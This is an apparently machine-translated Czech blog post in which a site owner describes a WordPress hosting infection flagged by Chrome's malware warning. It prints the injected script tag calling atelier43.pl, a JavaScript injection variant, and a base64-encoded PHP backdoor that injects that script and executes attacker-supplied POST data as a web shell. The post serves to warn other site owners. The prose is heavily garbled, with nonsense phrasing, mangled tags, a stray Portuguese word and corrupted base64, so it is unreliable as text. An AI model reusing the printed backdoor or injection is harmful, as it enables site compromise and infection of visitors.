Přestože Chrome je prohlížeč, který používáte na den, získal ještě jeden bod v mém účtu. Je to prohlížeč, který začne rychleji na mém pc, tam, když musím jít na síť a nemůže dočkat, až se otevřít jiný prohlížeč otevřít mohu použít. Dnes, když si otevřete přijatou zprávu, která je na obrázku:
Webové stránky antoniocampos.net obsahuje prvky tohoto webu atelier43.pl, který se zdá být hostitelem malware - tj., software, který může poškodit váš počítač nebo jinak působit bez vašeho souhlasu. Jen návštěvě stránek, které obsahují malware, může infikovat počítač.
Pro podrobnější informace o problémech s těmito prvky, navštivte Domů Bezpečné prohlížení Diagnostika Google na atelier43.pl.
poté, co při pohledu na zdrojový kód, který jsem viděl, že nějak bylo vloženého kódu v původním, Škodlivého kódu byla vložena:
<skript src = http:/ / atelier43.pl/images/gifimg.php ></ script>
Ihned po uzavření tag </ kus>, Zpět na všechny ostatní oblasti sídlí dohromady a všechny oblasti měly stejné příznaky, Po důkladné analýze jsem si všiml, že některé soubory byly infikovány injekce, Dosah jako soubor měl jiný kód.
V souborech javascript (. js):
document.write(‘<skript src = http:/ / atelier43.pl/images/gifimg.php >< / script>');
Html soubory se zobrazují v kódu výše popsaným způsobem a v souborech. Php následující kód:
<?php eval(base64_decode(‘aWYoIWZ1bmN0aW9uX2V4aXN0cygncHEzazcnKSl7ZnVuY3Rpb24gcHEzazcoJHMpe2lmKH
ByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ I2lzJywkcywkYSkpZm9yZWF
jaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk NSl7JGU9cHJlZ19tYXRj
aCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF
0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFx
iIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2
RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRja
F9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14 XSo/KT4jaXM
nLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aF
xzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc
3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycp
LicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlK
CdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkYwWld4cFpYSTBNeTV3YkM5cGJXRm5aW
E12WjJsbWFXMW5MbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCR
zLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHM
sMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24
gcHEzazcyKCRhLCRiLCRjLCRkKXtnbG9iYWwkcHEzazcxOyRzPWFycmF5KCk7aWYoZnVuY3R
pb25fZXhpc3RzKCRwcTNrNzEpKWNhbGxfdXNlcl9mdW5jKCRwcTNrNzEsJGEsJGIsJGMsJGQ
pO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3B
xM2s3JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1h
cnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bn
QoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9
jbGVhbigpO31vYl9zdGFydCgncHEzazcnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2J
fc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kcHEzazdsPSgoJGE9QHNldF9lcnJ
vcl9oYW5kbGVyKCdwcTNrNzInKSkhPSdwcTNrNzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY2
9kZSgkX1BPU1RbJ2UnXSkpOw == ')); ?>
Tento kód je zodpovědný za nakažení soubory, pokud mají base64_decode a analyzovat kód se objeví způsob, jakým byly infikované soubory, ale nevysvětluje, jak se kód "vstoupil" poprvé.
Kromě těchto infekcí craidos více souborů, s několika jmény, které čekají na poštovní směrovací číslo php a běží na serveru, ponechává všechny soubory, které uživatel používá zranitelné místo.
Po několika vyhledávání Google všechny body na chybu v Wordpress, ale nenašli, že verze, Myslím, že bys měl být v 2.8.6 hosting pro tento účet mám 3 wordpress instalações všechny aktualizován 2.8.6. Podle moudrosti Google nebyl první, kdo se nakazit touto mor, i když články jsem našel na google, nejsou stejné, infekcí a výskyt škodlivého kódu, je podobný tomu, co se mi stalo.
Takže radím všem, kteří mají stránky v Wordpress, aby zjistil, zda jsou nakaženi.
Já jsem stahovat všechny soubory, které jste hostitelem na tomto serveru pro bližší pohled na to, co se stalo, Myslím, že nepřišel k žádné závěry, jak jsem se nakazil, protože nemám přístup k protokoly apache, Ale aspoň budu muset čistit všechny soubory.
Jedním z řešení je smazat všechny soubory v zařízení a vložit nové verze všech souborů, ale to způsobí, že všechny přidávat vlastní témata a pluginy jsou ztraceny, a vynutit instalaci všech pluginů znovu.
Smůlu DESOLVE na řešení (alespoň čištění souborů) vytvořit nový příspěvek se stejným.
Nový příspěvek